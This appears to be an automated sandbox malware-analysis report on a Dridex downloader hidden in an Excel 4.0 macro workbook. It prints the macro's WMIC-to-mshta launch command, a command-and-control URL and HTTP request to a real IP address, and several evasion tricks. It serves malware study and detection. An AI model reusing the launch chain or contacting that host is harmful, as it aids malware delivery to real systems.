Windows Analysis Report 08676789691.xlsm

Overview

General Information

Sample Name: 08676789691.xlsm
Analysis ID: 532305
MD5: 2ac8e068af04acae7b07a376b1adcf57
SHA1: 7034cd5a8fb78c201bfeae534c301029c2150bfe
SHA256: 7efd1141f6d4858cd381b53fabdb2906a0a23c1329dbae42327aeda63c934dfb
Tags: Dridexxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Dridex Downloader
Found malicious Excel 4.0 Macro
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Detected potential crypto function
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers

Classification

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 157.230.250.107:8080
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 157.230.250.107:8080

Networking:

barindex
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 157.230.250.107:8080
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 157.230.250.107 157.230.250.107
Source: unknown TCP traffic detected without corresponding DNS query: 157.230.250.107
Source: unknown TCP traffic detected without corresponding DNS query: 157.230.250.107
Source: unknown TCP traffic detected without corresponding DNS query: 157.230.250.107
Source: unknown TCP traffic detected without corresponding DNS query: 157.230.250.107
Source: EXCEL.EXE, 00000000.00000002.671221919.0000000004F00000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669811445.0000000003320000.00000002.00020000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:
Source: mshta.exe, 00000006.00000002.669270394.000000000045A000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:808
Source: mshta.exe, 00000006.00000002.669270394.000000000045A000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080
Source: mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhore
Source: mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhoreh
Source: mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9
Source: mshta.exe, 00000006.00000002.670704206.0000000003F35000.00000004.00000040.sdmp, mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp, mshta.exe, 00000006.00000002.669246044.0000000000413000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
Source: mshta.exe, 00000006.00000002.670704206.0000000003F35000.00000004.00000040.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9enM
Source: mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9ez:vy
Source: mshta.exe, 00000006.00000002.669270394.000000000045A000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107:8t
Source: mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250.107t.rtf
Source: mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://157.230.250P.6.
Source: mshta.exe, 00000006.00000002.669184783.00000000003AE000.00000004.00000020.sdmp String found in binary or memory: http://157.230.HTTP.6.0
Source: EXCEL.EXE, 00000000.00000002.671221919.0000000004F00000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669811445.0000000003320000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.671221919.0000000004F00000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669811445.0000000003320000.00000002.00020000.sdmp String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.671756590.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.670016804.0000000003507000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.671756590.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.670016804.0000000003507000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.673679216.00000000059FE000.00000004.00000001.sdmp String found in binary or memory: http://purl.or
Source: EXCEL.EXE, 00000000.00000002.675045303.00000000078C6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.675067278.0000000007936000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.675084344.0000000007996000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.675020293.0000000007890000.00000004.00000001.sdmp String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.675020293.0000000007890000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.675045303.00000000078C6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.675067278.0000000007936000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.675084344.0000000007996000.00000004.00000001.sdmp String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: mshta.exe, 00000006.00000002.670256240.0000000003800000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: WMIC.exe, 00000002.00000002.539805239.0000000001B20000.00000002.00020000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.671756590.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.670016804.0000000003507000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.671756590.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.670016804.0000000003507000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: mshta.exe, 00000006.00000002.670256240.0000000003800000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.671221919.0000000004F00000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669811445.0000000003320000.00000002.00020000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.671756590.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.670016804.0000000003507000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.671221919.0000000004F00000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669811445.0000000003320000.00000002.00020000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: mshta.exe, 00000006.00000002.669811445.0000000003320000.00000002.00020000.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87F2F9FF.png Jump to behavior
Source: global traffic HTTP traffic detected: GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: pissoffHost: 157.230.250.107:8080

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\mshta.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud:

barindex
Yara detected Dridex Downloader
Source: Yara match File source: C:\ProgramData\SKZbt.rtf, type: DROPPED

System Summary:

barindex
Found malicious Excel 4.0 Macro
Source: 08676789691.xlsm Macro extractor: Sheet: Macro1 contains: mshta
Found Excel 4.0 Macro with suspicious formulas
Source: 08676789691.xlsm Initial sample: EXEC
Found protected and hidden Excel 4.0 Macro sheet
Source: 08676789691.xlsm Initial sample: Sheet name: Macro1
Contains functionality to create processes via WMI
Source: EXCEL.EXE, 00000000.00000002.673725130.0000000005A4E000.00000004.00000001.sdmp Binary or memory string: C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\SKZbt.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Defaultty=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=4OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=GIGIYTFUSERNAME=userUSERPROFILE=C:\Users\userWecVersionForRosebud.64C=4windir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.logicti1
Found obfuscated Excel 4.0 Macro
Source: 08676789691.xlsm Macro extractor: Sheet: Macro1 high usage of CHAR() function: 15
Found a hidden Excel 4.0 Macro sheet
Source: 08676789691.xlsm Macro extractor: Sheet name: Macro1
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Detected potential crypto function
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 0_2_02E966E8
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966F3 0_2_02E966F3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E9E9F1 0_2_02E9E9F1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96340 0_2_02E96340
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96743 0_2_02E96743
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E96753 0_2_02E96753
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E9CF01 0_2_02E9CF01
Source: C:\Windows\System32\wbem\WMIC.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\SKZbt.rtf"
Source: unknown Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\SKZbt.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\SKZbt.rtf" Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: EXCEL.EXE, 00000000.00000002.671221919.0000000004F00000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669811445.0000000003320000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$08676789691.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD99B.tmp Jump to behavior
Source: classification engine Classification label: mal88.troj.expl.evad.winXLSM@4/6@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: 08676789691.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: 08676789691.xlsm Initial sample: OLE zip file path = docProps/custom.xml
Source: AA330000.0.dr Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

barindex
Creates and opens a fake document (probably a fake document to hide exploiting)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: cmd line: skzbt.rtf Jump to behavior
Source: unknown Process created: cmd line: skzbt.rtf
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wbem\WMIC.exe TID: 152 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 508 Thread sleep time: -60000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 rdtsc 0_2_02E966E8

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 rdtsc 0_2_02E966E8

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Source: EXCEL.EXE, 00000000.00000002.669497726.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669413061.0000000000F50000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.669497726.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669413061.0000000000F50000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.669497726.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.669413061.0000000000F50000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 532305 Sample: 08676789691.xlsm Startdate: 02/12/2021 Architecture: WINDOWS Score: 88 24 Found malicious Excel 4.0 Macro 2->24 26 Yara detected Dridex Downloader 2->26 28 Contains functionality to create processes via WMI 2->28 30 6 other signatures 2->30 6 EXCEL.EXE 31 11 2->6         started        10 mshta.exe 9 2->10         started        process3 dnsIp4 16 C:\Users\user\Desktop\~$08676789691.xlsm, data 6->16 dropped 18 C:\Users\user\...\08676789691.xlsm  (copy), Microsoft 6->18 dropped 20 C:\ProgramData\SKZbt.rtf, HTML 6->20 dropped 32 Creates and opens a fake document (probably a fake document to hide exploiting) 6->32 13 WMIC.exe 6->13         started        22 157.230.250.107, 49167, 8080 DIGITALOCEAN-ASNUS United States 10->22 file5 signatures6 process7 signatures8 34 Creates processes via WMI 13->34
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
157.230.250.107
 unknown United States
14061 DIGITALOCEAN-ASNUS false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e false
  • Avira URL Cloud: safe
 unknown